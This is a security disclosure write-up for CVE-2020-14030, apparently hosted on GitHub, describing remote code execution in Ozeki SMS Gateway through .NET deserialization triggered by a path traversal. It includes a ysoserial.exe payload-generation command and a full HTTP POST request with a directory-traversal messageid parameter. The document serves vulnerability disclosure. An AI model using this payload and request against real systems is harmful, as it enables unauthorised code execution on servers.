Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2020-14030-RCE via .NET Deserialization-Ozeki SMS Gateway/
Disclosures/CVE-2020-14030-RCE via .NET Deserialization-Ozeki SMS Gateway/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 

CVE-2020-14030: Ozeki SMS Gateway Remote Code Execution via .NET Deserialization

The Ozeki SMS Gateway software, versions 4.17.6 and below, stores SMSs in .NET serialized format on the filesystem.
By generating and writing to the disk malicious .NET serialized files, an attacker can trick Ozeki into deserializing them resulting in arbitrary code execution.

Requirements:

This vulnerability requires:

  • Access to an Ozeki Web Application administration interface with "admin" credentials

Proof Of Concept:

We generate the malicious deserialization payload using the YSoSerial.NET tool with the following command:

ysoserial.exe -f BinaryFormatter -c 'whoami > C:\Windows\Temp\Deserialization.txt' -g DataSet

Note: We will need to decode the payload if it is in base64 form to obtain a functional .NET serialized file.
Note 2: When deserializaing the payload the command that will be executed will be: whoami > C:\Windows\Temp\Deserialization.txt

Upload the serialized payload file to the server (via "Import Contacts" or Voice SMS Attachment):

We can view the event logs in order to confirm that the file was successfully uploaded to "C:\TEMP\DataSet.txt":

And indeed, if we look directly on the file system we can find the desired file containing our desired serialized payload:

Now, we use a path traversal in the “Move SMS Folder” functionality to trick Ozeki into deserializing the file.
This functionality does 3 things:

  • Takes the "messageid" of an SMS file in an unsafe manner so we can use a ".." path traversal to point it to a file outside of the user's SMS boxed (Ex. inbox, outbox, sent, etc.)
  • Tries to move the file to the desired box, but does not succeed due to the path traversal
  • Reads and deserializes the file in order to display it in the web interface.

This last step is what interest us the most as during the deserialization phase our malicious payload will result in code execution.

Request:

POST /default HTTP/1.1
Host: <IP>:9501
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: usrckenc=b3c***TRUNCATED***04c

layout=MENUVIEW&MAIN=USERMAIN&MENU=USERMENU&user=admin&folder=outbox&movetofolder=sent&messageid_..\..\..\..\..\..\..\..\Windows\Temp\DataSet.b64.txt=on

If all the above steps were performed correctly we will see the following results:

  • The "DataSet.txt.error" file will appear signifying that the path traversal was successful
  • The above command was executed successfully and the file "Deserialization.txt" was created

Additional Resources:

YSoSerial.NET